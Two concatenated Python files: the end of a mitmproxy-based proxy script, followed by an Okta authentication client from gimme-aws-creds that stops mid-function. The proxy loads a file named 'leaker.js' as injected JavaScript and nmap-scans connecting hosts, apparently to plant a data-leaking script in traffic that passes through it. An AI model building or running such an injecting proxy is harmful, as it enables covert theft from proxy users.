rep = error_html.replace('errorcode',str(errorcode)).replace('errordescription',str(errordescrp))
return rep.encode()
def sqlcheck_ip(self,ipint):
hfl = cursor.execute("""SELECT COUNT(*) FROM blacklisted WHERE ? BETWEEN first AND last;""", [ipint])
ret = hfl.fetchone()[0]
print("Returning ip range check=",ret)
return ret
def sqlread_exists(self,table,idm,value):
hfl = cursor.execute("""SELECT COUNT(*) FROM """ +str(table) +""" WHERE """+str(idm) +""" = ?;""", [str(value)])
ret = hfl.fetchone()[0]
print(table," ",idm," ",value,"=",ret)
return ret
def addtonmap(self,ip,port):
print("Trying adding to db",ip,port)
hfl = cursor.execute("""SELECT COUNT(*) FROM nmap_processed WHERE processed = 0 AND ip = ?;""",[str(ip)])
fkr = hfl.fetchone()[0]
print("found",fkr)
if fkr == 0:
cursor.executemany("""INSERT INTO nmap_processed VALUES (?,?,0);""",[(str(ip),port)])
conn.commit()
def checknmap(self,ip,port):
hfl = cursor.execute("""SELECT COUNT(*) FROM nmap_processed WHERE processed = 2 AND ip = ?;""",[str(ip)])
fkr = hfl.fetchone()[0]
print("Checking nmap database",fkr)
ret = True if fkr != 0 else False
return ret
def scan_callback(host, scan_result):
print('_______________________________________________________________________')
print(host,scan_result)
time.sleep(5+random.randint(2,5))
proxy_methods = ['polipo','squid-http','http-proxy']
try:
for i in scan_result['scan'][host]['tcp']:
if scan_result['scan'][host]['tcp'][i]['name'] in proxy_methods:
print("Proxy detected blocking")
cursor.execute("""UPDATE nmap_processed SET processed = 2 WHERE ip = ?;""",[str(host)])
conn.commit()
except Exception as e:
print("Scan error")
cursor.execute("""UPDATE nmap_processed SET processed = 1 WHERE ip = ?;""",[str(host)])
conn.commit()
print('_______________________________________________________________________')
def nmap_parse():
print("Started Thread")
nm = nmap.PortScannerAsync()
re_scan = nm.scan(hosts="127.0.0.1", arguments='--script http-open-proxy.nse -p8080', callback=scan_callback)
while nm.still_scanning():
print("Continuing on batch scan ...")
def nmap_parse():
hfl = cursor.execute("""SELECT * FROM nmap_processed WHERE processed = 0;""")
fkr = hfl.fetchall()
nm = nmap.PortScannerAsync()
for host in fkr:
re_scan = nm.scan(hosts=host[0], arguments='--script http-open-proxy.nse -p' +str(host[1]), callback=scan_callback)
while nm.still_scanning():
print("Continuing on batch scan ...")
nm.wait(2)
# see source mitmproxy/master.py for details
#def loop_in_thread(loop, m):
# asyncio.set_event_loop(loop) # This is the key.
# m.run_loop(loop.run_forever)
if __name__ == "__main__":
conn = sqlite3.connect('db/filtered.db',check_same_thread=False)
cursor = conn.cursor()
print(cursor)
with open('leaker.js', 'r') as f:
injected_javascript = f.read()
error_html = open('GUI/error.html').read()
threading.Timer(5, nmap_parse).start()
options = Options(listen_host='0.0.0.0', listen_port=8080, http2=True,client_certs='certs/')
m = DumpMaster(options, with_termlog=True, with_dumper=False)
config = ProxyConfig(options)
m.server = ProxyServer(config)
m.addons.add(Addon())
# run mitmproxy in backgroud, especially integrated with other server
loop = asyncio.get_event_loop()
asyncio.set_event_loop(loop) # This is the key.
m.run_loop(loop.run_forever)
#t = threading.Thread( target=loop_in_thread, args=(loop,m) )
#t.start()
print('going to shutdown mitmproxy')
m.shutdown()
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and* limitations under the License.*
"""
import base64
import copy
import getpass
import re
import socket
import time
import uuid
import webbrowser
from codecs import decode
from multiprocessing import Process
from urllib.parse import parse_qs
from urllib.parse import urlparse, quote
import keyring
import requests
from bs4 import BeautifulSoup
from fido2.utils import websafe_decode
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from .errors import GimmeAWSCredsMFAEnrollStatus
from .registered_authenticators import RegisteredAuthenticators
class OktaClient(object):
"""
The Okta Client Class performs the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search(r'^https://(.*)/?', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise GimmeAWSCredsMFAEnrollStatus()
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _print_correct_answer(self, answer):
""" prints the correct answer to the additional factor authentication step in Okta Verify"""
self.ui.info("Additional factor correct answer is: " + str(answer))
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if response.status_code == 200:
pass
# Handle known Okta error codes
# ref: https://developer.okta.com/docs/reference/error-codes/#example-errors-listed-by-http-return-code
elif response.status_code in [400, 401, 403, 404, 409, 429, 500, 501, 503]:
if response_data['errorCode'] == "E0000004":
if self.KEYRING_ENABLED:
try:
self.ui.info("Stored password is invalid, clearing. Please try again")
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
# If the error code isn't one we know how to handle, raise an exception
else:
response.raise_for_status()
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
passcode = self._mfa_code
if factor['factorType'] is None:
# Prompt user for which Duo factor to use
raise duo.FactorRequired(factor['id'], state_token)
if factor['factorType'] == "passcode" and not passcode:
try:
passcode = self.ui.input("Enter verification code(remember to refresh token between uses): ")
except Exception:
raise duo.PasscodeRequired(factor['id'], state_token)
response_data = self._get_response_data(factor['_links']['verify']['href'], state_token)
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(self.ui, verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
while response_data['status'] != 'SUCCESS':
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
self.ui.info("Waiting for MFA success...")
time.sleep(2)
response_data = self._get_response_data(response_data.get('_links')['next']['href'], state_token)
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
# return None
def _get_response_data(self, href, state_token):
response = self._http_client.post(href,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
return response_data
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
elif factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ", hidden=True)
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
try:
if '_embedded' in response_data['_embedded']['factor']:
if response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer']:
if self._print_correct_answer:
self._print_correct_answer(response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer'])
self._print_correct_answer = None
except:
pass
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# should be deprecated soon as OKTA move forward webauthN
# just for backward compatibility
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except Exception:
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
""" Authenticator """
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
# noinspection PyBroadException
try:
client_data, assertion = webauthn_client.verify()
except Exception:
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data,
'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for input_tag in saml_soup.find_all('input'):
if input_tag.get('name') == 'SAMLResponse':
saml_response = input_tag.get('value')
elif input_tag.get('name') == 'RelayState':
relay_state = input_tag.get('value')
if saml_response is None:
state_token = self._extract_state_token_from_http_response(response)
if state_token:
api_response = self.stepup_auth(url, state_token)
if 'sessionToken' in api_response:
saml_request_url = url + '?sessionToken=' + api_response['sessionToken']
else:
saml_request_url = url + '?stateToken=' + api_response['_links']['next']['href']
saml_response = self.get_saml_response(saml_request_url)
return saml_response
saml_error = 'Did not receive SAML Response after successful authentication [' + url + ']'
if saml_soup.find(class_='error-content') is not None:
saml_error += '\n' + saml_soup.find(class_='error-content').get_text()
raise RuntimeError(saml_error)
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
# even though duo supports both passcode and push, okta only lists web as an available factor. This if statement
# adds the additional supported factors only if the provider is duo, and the web factor is the only one provided
if len(factors) == 1 and factors[0].get('provider') == 'DUO' and factors[0].get('factorType') == 'web':
push = copy.deepcopy(factors[0])
push['factorType'] = "push"
factors.append(push)
passcode = copy.deepcopy(factors[0])
passcode['factorType'] = "passcode"
factors.append(passcode)
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self._get_user_int_factor_choice(len(factors))
# make sure the choice is valid
if selection is None:
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[selection]
def _get_user_int_factor_choice(self, max_int, max_retries=5):
for _ in range(max_retries):
value = self.ui.input('Selection: ')
try:
selection = int(value.strip())
except ValueError:
self.ui.warning(
'Invalid selection {!r}, must be an integer value.'.format(value)
)
continue
if 0 <= selection <= max_int:
return selection
else:
self.ui.warning(
'Selection {!r} out of range <0, {}>'.format(selection, max_int)
)
return None
def _build_factor_name(self, factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
elif factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
factor_name = None
try:
registered_authenticators = RegisteredAuthenticators(self.ui)
credential_id = websafe_decode(factor['profile']['credentialId'])
factor_name = registered_authenticators.get_authenticator_user(credential_id)
except Exception:
pass
default_factor_name = factor['profile'].get('authenticatorName') or factor['factorType']
factor_name = factor_name or default_factor_name
return factor['factorType'] + ": " + factor_name
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, offer to save the password
password = keyring.get_password(self.KEYRING_SERVICE, username)
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
if self.ui.input("Do you want to save this password in the keyring? (y/N) ") == 'y':
try:
keyring.set_password(self.KEYRING_SERVICE, username, password)
self.ui.info("Password for {} saved in keyring.".format(username))
except RuntimeError as err:
self.ui.warning("Failed to save password in keyring: " + str(err))
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
def setup_fido_authenticator(self):
setup_fido_authenticator_url = self._okta_org_url + '/user/settings/factors/setup?factorType=FIDO_WEBAUTHN'
response = self._http_client.get(setup_fido_authenticator_url, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
parsed_url = urlparse(response.url)
if parsed_url and parsed_url.path == '/user/verify_password':
response = self._verify_password(response)
state_token = self._extract_state_token_from_http_response(response)
if not state_token:
raise RuntimeError('Could not extract state token from http response')
try:
self.stepup_auth(setup_fido_authenticator_url, state_token)
except errors.GimmeAWSCredsMFAEnrollStatus:
# Expected while adding a new fido authenticator
pass
response = self._http_client.get(setup_fido_authenticator_url, json={'stateToken': state_token},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
state_token = self._extract_state_token_from_http_response(response)
credential_id, user_name = self._activate_webauthn_factor(state_token)
self.ui.info('\nAuthenticator setup finished successfully.')
return credential_id, user_name
def _verify_password(self, verify_password_page_response):
creds = self._get_username_password_creds()
saml_soup = BeautifulSoup(verify_password_page_response.text, "html.parser")
token_elem = saml_soup.find(id='_xsrfToken')
if not token_elem:
raise RuntimeError('Could not find expected xsrf token in password verification page: id="_xsrfToken"')
if not token_elem.has_attr('value'):
raise RuntimeError('Could not find expected "value" attribute for xsrf dom element in password '
'verification page')
xsrf_token = token_elem.get('value')
if not xsrf_token:
raise RuntimeError('Could not find non-blank "value" attribute for xsrf dom element in password'
'verification page')
headers = self._get_headers()
# Must be form urlencoded
headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
data = '_xsrfToken={xsrf_token}&password={password}'.format(xsrf_token=xsrf_token, password=creds['password'])
response = self._http_client.post(self._okta_org_url + '/user/verify_password',
data=data, headers=headers, verify=self._verify_ssl_certs)
response.raise_for_status()
response = self._http_client.get(
